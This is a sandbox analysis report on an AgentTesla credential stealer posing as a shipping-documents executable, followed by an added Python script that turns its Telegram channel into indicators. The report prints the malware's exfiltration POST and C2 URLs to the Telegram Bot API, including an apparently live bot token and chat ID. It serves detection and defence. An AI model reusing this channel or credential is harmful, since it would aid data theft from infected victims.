Windows Analysis Report
BL-SHIPPING DOCUMENTS.exe

Overview

General Information

Sample Name: BL-SHIPPING DOCUMENTS.exe
Analysis ID: 756203
MD5: 69fe54a9cafee09f25e0d3f7a51488c7
SHA1: 747373a2640c7fca04258681c7ec313be3b0db24
SHA256: dc72c7525da8aa1afaadaf707499054dd9be20d0c78318d2f63af1fa37d58546
Tags: agenttesla, exe

Detection

AgentTesla
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Multi AV Scanner detection for submitted file
Malicious sample detected (through community Yara rule)
Yara detected Telegram RAT
Yara detected AgentTesla
Snort IDS alert for network traffic
Tries to steal Mail credentials (via file / registry access)
Initial sample is a PE file and has a suspicious name
Writes to foreign memory regions
Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc)
Tries to harvest and steal ftp login credentials
.NET source code references suspicious native API functions
Sample is not signed and drops a device driver
Uses the Telegram API (likely for C&C communication)
Machine Learning detection for sample
Injects a PE file into a foreign process
.NET source code contains very large array initializations
Executable has a suspicious name (potential lure to open the executable)
Queries sensitive network adapter information (via WMI, Win32_NetworkAdapter, often done to detect virtual machines)
Tries to harvest and steal browser information (history, passwords, etc)
Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)
Queries the volume information (name, serial number etc) of a device
Yara signature match
Antivirus or Machine Learning detection for unpacked file
May sleep (evasive loops) to hinder dynamic analysis
Uses code obfuscation techniques (call, push, ret)
Detected potential crypto function
Yara detected Credential Stealer
JA3 SSL client fingerprint seen in connection with other malware
Found dropped PE file which has not been started or loaded
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Contains long sleeps (>= 3 min)
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
PE file does not import any functions
Sample file is different than original file name gathered from version info
Enables driver privileges
Drops PE files
Creates driver files
Spawns drivers
Queries sensitive processor information (via WMI, Win32_Processor, often done to detect virtual machines)
Creates or modifies windows services
Dropped file seen in connection with other malware
Creates a process in suspended mode (likely to inject code)
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)

Classification

  • System is w10x64
  • BL-SHIPPING DOCUMENTS.exe (PID: 6116, cmdline: C:\Users\user\Desktop\BL-SHIPPING DOCUMENTS.exe, MD5: 69FE54A9CAFEE09F25E0D3F7A51488C7)
    • CasPol.exe (PID: 5312, cmdline: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe, MD5: F866FC1C2E928779C7119353C3091F0C)
  • cleanup

Malware Configuration

Telegram RAT: {"C2 url": "https://api.telegram.org/bot5515611206:AAEcQSX8hXHOAxSYr8KUdLxGF5eqw4FRXoA/sendMessage"}
AgentTesla: {"Exfil Mode": "Telegram", "Telegram Url": "https://api.telegram.org/bot5515611206:AAEcQSX8hXHOAxSYr8KUdLxGF5eqw4FRXoA/sendMessage?chat_id=1504449137"}
Yara Matches: Memory Dumps

Source: 00000001.00000000.397838302.0000000000402000.00000040.00000400.00020000.00000000.sdmp | Rule: JoeSecurity_AgentTesla_1 | Description: Yara detected AgentTesla | Author: Joe Security
Source: 00000001.00000000.397838302.0000000000402000.00000040.00000400.00020000.00000000.sdmp | Rule: JoeSecurity_AgentTesla_2 | Description: Yara detected AgentTesla | Author: Joe Security
Source: 00000001.00000000.397838302.0000000000402000.00000040.00000400.00020000.00000000.sdmp | Rule: Windows_Trojan_AgentTesla_d3ac2b2f | Description: unknown | Author: unknown | Strings:
  • 0x31be8:$a13: get_DnsResolver
  • 0x30301:$a20: get_LastAccessed
  • 0x325f5:$a27: set_InternalServerPort
  • 0x3292a:$a30: set_GuidMasterKey
  • 0x30413:$a33: get_Clipboard
  • 0x30421:$a34: get_Keyboard
  • 0x317bf:$a35: get_ShiftKeyDown
  • 0x317d0:$a36: get_AltKeyDown
  • 0x3042e:$a37: get_Password
  • 0x30f1a:$a38: get_PasswordHash
  • 0x32029:$a39: get_DefaultCredentials
Source: 00000001.00000002.819488007.0000000003151000.00000004.00000800.00020000.00000000.sdmp | Rule: JoeSecurity_AgentTesla_1 | Description: Yara detected AgentTesla | Author: Joe Security
Source: 00000001.00000002.819488007.0000000003151000.00000004.00000800.00020000.00000000.sdmp | Rule: JoeSecurity_TelegramRAT | Description: Yara detected Telegram RAT | Author: Joe Security
(further entries collapsed in the original report)
Yara Matches: Unpacked PEs

Source: 1.0.CasPol.exe.400000.0.unpack | Rule: JoeSecurity_AgentTesla_1 | Description: Yara detected AgentTesla | Author: Joe Security
Source: 1.0.CasPol.exe.400000.0.unpack | Rule: JoeSecurity_AgentTesla_2 | Description: Yara detected AgentTesla | Author: Joe Security
Source: 1.0.CasPol.exe.400000.0.unpack | Rule: MALWARE_Win_AgentTeslaV3 | Description: AgentTeslaV3 infostealer payload | Author: ditekSHen | Strings:
  • 0x348d8:$s10: logins
  • 0x34358:$s11: credential
  • 0x30613:$g1: get_Clipboard
  • 0x30621:$g2: get_Keyboard
  • 0x3062e:$g3: get_Password
  • 0x319af:$g4: get_CtrlKeyDown
  • 0x319bf:$g5: get_ShiftKeyDown
  • 0x319d0:$g6: get_AltKeyDown
Source: 1.0.CasPol.exe.400000.0.unpack | Rule: Windows_Trojan_AgentTesla_d3ac2b2f | Description: unknown | Author: unknown | Strings:
  • 0x31de8:$a13: get_DnsResolver
  • 0x30501:$a20: get_LastAccessed
  • 0x327f5:$a27: set_InternalServerPort
  • 0x32b2a:$a30: set_GuidMasterKey
  • 0x30613:$a33: get_Clipboard
  • 0x30621:$a34: get_Keyboard
  • 0x319bf:$a35: get_ShiftKeyDown
  • 0x319d0:$a36: get_AltKeyDown
  • 0x3062e:$a37: get_Password
  • 0x3111a:$a38: get_PasswordHash
  • 0x32229:$a39: get_DefaultCredentials
Sigma Overview

No Sigma rule has matched

Snort IDS Alert Overview

Timestamp: 11/29/22-20:01:10.306536
Source IP: 192.168.2.5
Destination IP: 149.154.167.220
Source Port: 49705
Destination Port: 443
SID: 2851779
Protocol: TCP
Classtype: A Network Trojan was detected

              AV Detection

Source: BL-SHIPPING DOCUMENTS.exe | ReversingLabs: Detection: 22%
Source: BL-SHIPPING DOCUMENTS.exe | Virustotal: Detection: 26%
Source: BL-SHIPPING DOCUMENTS.exe | Joe Sandbox ML: detected
Source: 1.0.CasPol.exe.400000.0.unpack | Avira: Label: TR/Spy.Gen8
Source: 1.0.CasPol.exe.400000.0.unpack | Malware Configuration Extractor: Agenttesla {"Exfil Mode": "Telegram", "Telegram Url": "https://api.telegram.org/bot5515611206:AAEcQSX8hXHOAxSYr8KUdLxGF5eqw4FRXoA/sendMessage?chat_id=1504449137"}
Source: CasPol.exe.5312.1.memstrmin | Malware Configuration Extractor: Telegram RAT {"C2 url": "https://api.telegram.org/bot5515611206:AAEcQSX8hXHOAxSYr8KUdLxGF5eqw4FRXoA/sendMessage"}
Source: unknown | HTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.5:49705 version: TLS 1.2
Source: BL-SHIPPING DOCUMENTS.exe | Static PE information: HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
Source: Binary string: C:\Users\Azez\Downloads\JesusIsTheLord\obj\Debug\Tora.pdb | source: BL-SHIPPING DOCUMENTS.exe
Source: Binary string: C:\agent\1\s\sys\x64\Release\ProcExpDriver.pdb | source: ?????.sys.0.dr

              Networking

Source: Traffic | Snort IDS: 2851779 ETPRO TROJAN Agent Tesla Telegram Exfil 192.168.2.5:49705 -> 149.154.167.220:443
Source: unknown | DNS query: name: api.telegram.org
Source: Joe Sandbox View | JA3 fingerprint: 3b5074b1b5d032e5620f69f9f700ff0e
Source: global traffic | HTTP traffic detected: POST /bot5515611206:AAEcQSX8hXHOAxSYr8KUdLxGF5eqw4FRXoA/sendDocument HTTP/1.1 | Content-Type: multipart/form-data; boundary=---------------------------8dad24475608cee | Host: api.telegram.org | Content-Length: 1001 | Expect: 100-continue | Connection: Keep-Alive
Source: Joe Sandbox View | IP Address: 149.154.167.220
Source: unknown | Network traffic detected: HTTP traffic on port 49705 -> 443
Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49705
Source: CasPol.exe, 00000001.00000002.819488007.0000000003151000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://127.0.0.1:HTTP/1.1
Source: CasPol.exe, 00000001.00000002.819488007.0000000003151000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://DynDns.comDynDNSnamejidpasswordPsi/Psi
Source: CasPol.exe, 00000001.00000002.819488007.0000000003151000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://TcwLAp.com
Source: CasPol.exe, 00000001.00000002.824168793.00000000034D8000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://api.telegram.org
Source: CasPol.exe, 00000001.00000002.829202853.000000000634E000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://crl.globalsign.net/root-r2.crl0
Source: CasPol.exe, 00000001.00000002.824079455.00000000034C3000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
Source: CasPol.exe, 00000001.00000002.819488007.0000000003151000.00000004.00000800.00020000.00000000.sdmp, CasPol.exe, 00000001.00000002.824168793.00000000034D8000.00000004.00000800.00020000.00000000.sdmp, CasPol.exe, 00000001.00000002.823692783.0000000003476000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://FZsMKmQQms.net
Source: CasPol.exe, 00000001.00000002.824079455.00000000034C3000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://api.telegram.org
Source: CasPol.exe, 00000001.00000002.819488007.0000000003151000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://api.telegram.org/bot5515611206:AAEcQSX8hXHOAxSYr8KUdLxGF5eqw4FRXoA/
Source: CasPol.exe, 00000001.00000002.819488007.0000000003151000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://api.telegram.org/bot5515611206:AAEcQSX8hXHOAxSYr8KUdLxGF5eqw4FRXoA/1504449137%discordapi%yyy
Source: CasPol.exe, 00000001.00000002.824079455.00000000034C3000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://api.telegram.org/bot5515611206:AAEcQSX8hXHOAxSYr8KUdLxGF5eqw4FRXoA/sendDocument
Source: CasPol.exe, 00000001.00000002.824079455.00000000034C3000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://api.telegram.org4
Source: ?????.sys.0.dr | String found in binary or memory: https://www.sysinternals.com0
Source: CasPol.exe, 00000001.00000002.819488007.0000000003151000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://www.theonionrouter.com/dist.torproject.org/torbrowser/9.5.3/tor-win32-0.4.3.6.ziphttps://www
Source: unknown | DNS traffic detected: queries for: api.telegram.org
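The extracted configuration and the Networking findings above give everything needed to turn this sample's Telegram channel into a detection: the bot URL shape (bot<id>:<token>, a method, an optional chat_id) and the traits of the client request (POST to /sendDocument, multipart upload, no User-Agent header). The Python below is an added example written for this page; it is not Joe Sandbox code and not part of the report. The token alphabet, the set of exfiltration methods and the sample config and request text are this example's own constructions, assembled from the values shown above; the multipart body is not on the page and is omitted.

```python
import re
from dataclasses import dataclass, field
from typing import Dict, List, Optional

# Telegram Bot API URL shape as it appears in the extracted config and memory
# strings above: https://api.telegram.org/bot<id>:<token>/<method>?chat_id=<id>
# The token alphabet (letters, digits, '_', '-') is an assumption based on the
# token printed in the report.
TELEGRAM_BOT_RE = re.compile(
    r"https?://api\.telegram\.org/bot(?P<bot_id>\d+):(?P<token>[A-Za-z0-9_-]+)"
    r"(?:/(?P<method>[A-Za-z]+))?(?:\?chat_id=(?P<chat_id>-?\d+))?"
)

# Bot API methods that move data off the host; both appear in the report.
EXFIL_METHODS = {"sendmessage", "senddocument"}

# Constructed sample: the two configuration blobs printed in the report.
SAMPLE_CONFIG = (
    '{"C2 url": "https://api.telegram.org/bot5515611206:'
    'AAEcQSX8hXHOAxSYr8KUdLxGF5eqw4FRXoA/sendMessage"}\n'
    '{"Exfil Mode": "Telegram", "Telegram Url": "https://api.telegram.org/bot5515611206:'
    'AAEcQSX8hXHOAxSYr8KUdLxGF5eqw4FRXoA/sendMessage?chat_id=1504449137"}\n'
)

# Constructed sample: the POST header block from the report re-joined with CRLF.
# The multipart body is not shown in the report and is omitted here.
SAMPLE_POST = (
    b"POST /bot5515611206:AAEcQSX8hXHOAxSYr8KUdLxGF5eqw4FRXoA/sendDocument HTTP/1.1\r\n"
    b"Content-Type: multipart/form-data; boundary=---------------------------8dad24475608cee\r\n"
    b"Host: api.telegram.org\r\n"
    b"Content-Length: 1001\r\n"
    b"Expect: 100-continue\r\n"
    b"Connection: Keep-Alive\r\n"
    b"\r\n"
)


@dataclass
class HttpRequest:
    method: str
    path: str
    version: str
    headers: Dict[str, str] = field(default_factory=dict)  # header names lower-cased


def extract_telegram_bots(text: str) -> List[Dict[str, Optional[str]]]:
    """Return every Telegram bot URL found in a blob of config or string output."""
    return [m.groupdict() for m in TELEGRAM_BOT_RE.finditer(text)]


def redact_token(token: str) -> str:
    """Keep a short prefix so the IOC can be shared without the live credential."""
    return token[:4] + "..."


def parse_http_request(raw: bytes) -> HttpRequest:
    """Parse the request line and headers of an HTTP/1.x request; the body is ignored."""
    head = raw.split(b"\r\n\r\n", 1)[0].decode("latin-1")
    request_line, *header_lines = head.split("\r\n")
    method, path, version = request_line.split(" ", 2)
    req = HttpRequest(method, path, version)
    for line in header_lines:
        name, _, value = line.partition(":")
        if name:
            req.headers[name.strip().lower()] = value.strip()
    return req


def classify_request(raw: bytes) -> Dict[str, object]:
    """Flag Telegram bot traffic together with the client traits the report calls
    out (no User-Agent header, multipart upload)."""
    req = parse_http_request(raw)
    bots = extract_telegram_bots("https://" + req.headers.get("host", "") + req.path)
    bot = bots[0] if bots else None
    findings: List[str] = []
    if bot is not None:
        findings.append("telegram-bot-api")
        if (bot["method"] or "").lower() in EXFIL_METHODS:
            findings.append("telegram-exfil-method:" + str(bot["method"]))
    if "user-agent" not in req.headers:
        findings.append("no-user-agent")
    if req.method == "POST" and req.headers.get("content-type", "").startswith("multipart/form-data"):
        findings.append("multipart-upload")
    exfil = any(f.startswith("telegram-exfil-method") for f in findings)
    return {"bot": bot, "findings": findings, "suspicious": exfil and "no-user-agent" in findings}


def iocs_from_report(config_text: str) -> Dict[str, List[str]]:
    """Collapse all bot URLs from a report into one shareable IOC record."""
    bots = extract_telegram_bots(config_text)
    return {
        "bot_ids": sorted({b["bot_id"] for b in bots if b["bot_id"]}),
        "chat_ids": sorted({b["chat_id"] for b in bots if b["chat_id"]}),
        "tokens_redacted": sorted({redact_token(b["token"]) for b in bots if b["token"]}),
        "domains": ["api.telegram.org"],
    }


if __name__ == "__main__":
    print(iocs_from_report(SAMPLE_CONFIG))
    print(classify_request(SAMPLE_POST))
```

On the wire the bot path sits inside TLS, so classify_request only applies to decrypted traffic or to a sandbox or proxy capture like the one above; without inspection, the DNS query for api.telegram.org and the destination IP are the only network-visible signals, and both are shared with legitimate Telegram clients. The bot token in the report is the attacker's live credential, which is why iocs_from_report truncates it before the record is shared.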

              System Summary

Source: 1.0.CasPol.exe.400000.0.unpack, type: UNPACKEDPE | Matched rule: AgentTeslaV3 infostealer payload Author: ditekSHen
Source: 1.0.CasPol.exe.400000.0.unpack, type: UNPACKEDPE | Matched rule: Windows_Trojan_AgentTesla_d3ac2b2f Author: unknown
Source: 00000001.00000000.397838302.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_AgentTesla_d3ac2b2f Author: unknown
Source: Process Memory Space: CasPol.exe PID: 5312, type: MEMORYSTR | Matched rule: Windows_Trojan_AgentTesla_d3ac2b2f Author: unknown
Source: initial sample | Static PE information: Filename: BL-SHIPPING DOCUMENTS.exe
Source: BL-SHIPPING DOCUMENTS.exe, 6WPvYiAf4rXCUiIeqR/yw3NM9q.cs | Large array initialization: get_hii: array initializer size 481808
Source: 1.0.CasPol.exe.400000.0.unpack, <PrivateImplementationDetails>{7B11A2CA-4195-4BA6-80B6-4DED58549CE3}/AB3968ED-5083-4DC4-8042-AEEF6AA978C6.cs | Large array initialization: .cctor: array initializer size 10967
Source: BL-SHIPPING DOCUMENTS.exe | Static file information: Suspicious name
Source: 1.0.CasPol.exe.400000.0.unpack, type: UNPACKEDPE | Matched rule: MALWARE_Win_AgentTeslaV3 author = ditekSHen, description = AgentTeslaV3 infostealer payload
Source: 1.0.CasPol.exe.400000.0.unpack, type: UNPACKEDPE | Matched rule: Windows_Trojan_AgentTesla_d3ac2b2f reference_sample = 65463161760af7ab85f5c475a0f7b1581234a1e714a2c5a555783bdd203f85f4, os = windows, severity = x86, creation_date = 2021-03-22, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.AgentTesla, fingerprint = cbbb56fe6cd7277ae9595a10e05e2ce535a4e6bf205810be0bbce3a883b6f8bc, id = d3ac2b2f-14fc-4851-8a57-41032e386aeb, last_modified = 2022-06-20
Source: 00000001.00000000.397838302.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_AgentTesla_d3ac2b2f reference_sample = 65463161760af7ab85f5c475a0f7b1581234a1e714a2c5a555783bdd203f85f4, os = windows, severity = x86, creation_date = 2021-03-22, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.AgentTesla, fingerprint = cbbb56fe6cd7277ae9595a10e05e2ce535a4e6bf205810be0bbce3a883b6f8bc, id = d3ac2b2f-14fc-4851-8a57-41032e386aeb, last_modified = 2022-06-20
Source: Process Memory Space: CasPol.exe PID: 5312, type: MEMORYSTR | Matched rule: Windows_Trojan_AgentTesla_d3ac2b2f reference_sample = 65463161760af7ab85f5c475a0f7b1581234a1e714a2c5a555783bdd203f85f4, os = windows, severity = x86, creation_date = 2021-03-22, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.AgentTesla, fingerprint = cbbb56fe6cd7277ae9595a10e05e2ce535a4e6bf205810be0bbce3a883b6f8bc, id = d3ac2b2f-14fc-4851-8a57-41032e386aeb, last_modified = 2022-06-20
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe | Code function: 1_2_013DF928
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe | Code function: 1_2_062276F0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe | Code function: 1_2_0622CF70
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe | Code function: 1_2_0622A4C0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe | Code function: 1_2_06225BC0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe | Code function: 1_2_0622768E
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe | Code function: 1_2_06225A70
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe | Code function: 1_2_0622F2E0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe | Code function: 1_2_06223330
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe | Code function: 1_2_0623BE8D
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe | Code function: 1_2_06239330
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe | Code function: 1_2_0623AF88
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe | Code function: 1_2_062355A0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe | Code function: 1_2_06237F80
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe | Code function: 1_2_06235148
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe | Code function: 1_2_06260040
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe | Code function: 1_2_06266BA8
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe | Code function: 1_2_06264940
Source: BL-SHIPPING DOCUMENTS.exe | Static PE information: No import functions for PE file found
Source: BL-SHIPPING DOCUMENTS.exe, 00000000.00000000.294039258.00000249F70DA000.00000002.00000001.01000000.00000003.sdmp | Binary or memory string: OriginalFilenameTora.exe4 vs BL-SHIPPING DOCUMENTS.exe
Source: BL-SHIPPING DOCUMENTS.exe | Binary or memory string: OriginalFilenameTora.exe4 vs BL-SHIPPING DOCUMENTS.exe
Source: C:\Users\user\Desktop\BL-SHIPPING DOCUMENTS.exe | Process token adjusted: Load Driver
Source: C:\Users\user\Desktop\BL-SHIPPING DOCUMENTS.exe | File created: C:\Users\user\AppData\Local\Temp\?????.sys
Source: C:\Users\user\Desktop\BL-SHIPPING DOCUMENTS.exe | Driver loaded: \Registry\Machine\System\CurrentControlSet\Services\TaskKill
Source: Joe Sandbox View | Dropped File: C:\Users\user\AppData\Local\Temp\?????.sys 440883CD9D6A76DB5E53517D0EC7FE13D5A50D2F6A7F91ECFC863BC3490E4F5C